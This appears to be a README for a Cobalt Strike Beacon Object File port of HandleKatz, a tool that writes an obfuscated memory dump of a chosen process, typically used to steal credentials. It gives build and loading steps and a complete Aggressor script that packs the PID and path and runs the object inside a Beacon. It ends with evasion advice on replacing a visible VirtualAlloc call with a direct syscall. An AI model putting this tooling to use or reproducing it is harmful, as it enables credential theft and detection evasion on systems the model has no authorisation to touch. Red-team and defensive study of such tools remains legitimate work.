This is a (mostly complete) port of the functionality presented by @thefLink and Code White GmbH. You guys deserve a large amount of thanks for taking the time to present your research!
This started as a personal question: would this work within Cobalt Strike, and if so, how?
- There are two required parameters, a `PID` and a filepath to write the dumpfile to (e.g. `handlekatz 780 C:\Users\User\Desktop\obfuscated.dmp`).
- In this case, you have two options:
  - Use the existing, compiled object file, located in the `dist` directory (AKA proceed to major step two)
  - Compile from source via the `Makefile`:

    ```sh
    cd src
    make clean
    make
    ```
- Load the `Aggressor` file from the `dist` directory in the `Script Manager`.
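To show how the two parameters on the usage line reach the BOF, here is an added Aggressor script for illustration; it is not the `.cna` shipped in `dist`. The object file name `handlekatz.x64.o`, the `"iz"` argument packing, the x64-only check and the output-path validation are assumptions of this example, not documented behaviour of the project; confirm them against the BOF's own argument parsing before relying on it.

```aggressor
# Added example (not the project's own .cna from dist): an Aggressor script
# that registers the `handlekatz` command, validates the two required
# parameters and passes them to the BOF.
#
# Assumptions not stated on the page: the object file is named
# handlekatz.x64.o and sits next to this script; the BOF reads the PID with
# BeaconDataInt() and the path with BeaconDataExtract(), which corresponds to
# the "iz" pack format below; x64 Beacons only.

beacon_command_register(
    "handlekatz",
    "HandleKatz BOF: write a dumpfile of the given process",
    "Usage: handlekatz <PID> <output file>\n\n" .
    "Example: handlekatz 780 C:\\Users\\User\\Desktop\\obfuscated.dmp");

alias handlekatz {
    local('$bid $pid $path $handle $data $args');
    $bid  = $1;
    $pid  = $2;
    $path = $3;

    # Both parameters are required.
    if (size(@_) != 3) {
        berror($bid, "Usage: handlekatz <PID> <output file>");
        return;
    }

    # The object file assumed here is x64 only.
    if (barch($bid) ne "x64") {
        berror($bid, "handlekatz only supports x64 Beacons");
        return;
    }

    # The PID must be a positive integer; it is packed as a 4-byte int.
    if ((!-isnumber $pid) || (int($pid) <= 0)) {
        berror($bid, "PID must be a positive integer, got: $pid");
        return;
    }

    # Refuse relative paths: the dump would land in the Beacon's current
    # directory rather than where the operator expects.
    if (!($path ismatch '[A-Za-z]:\\.*')) {
        berror($bid, "Output path must be absolute (e.g. C:\\Windows\\Temp\\obfuscated.dmp)");
        return;
    }

    # Read the compiled BOF from disk next to this script.
    $handle = openf(script_resource("handlekatz.x64.o"));
    $data   = readb($handle, -1);
    closef($handle);

    # "i" = 4-byte integer (the PID), "z" = zero-terminated string (the path).
    $args = bof_pack($bid, "iz", int($pid), $path);

    btask($bid, "Tasked beacon to dump PID $pid to $path");
    beacon_inline_execute($bid, $data, "go", $args);
}
```

The pack string must match the order and types the BOF extracts on the other side exactly: if the object reads the path first, or reads the PID as a string, `"iz"` will hand it a garbage PID and the handle operation fails before anything is written. Adjust the format string rather than the BOF in that case.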
- We're still using the `Win32` API and `Dynamic Function Resolution` (the `MODULE$Function` symbols are resolved by name when Beacon loads the object, so those API names remain visible in the BOF). How much "risk" that carries is for you to determine.
- You may attempt to incur a privileged action without sufficient requisite permissions. I can't keep you from burning your hand.
- Implement the one remaining overt `Win32 API` call invoked with the `Dynamic Function Resolution` syntax (`VirtualAlloc`) as a call to `NtAllocateVirtualMemory`. I've included the necessary header(s), with implementation, in `syscalls.h`. Enjoy! :)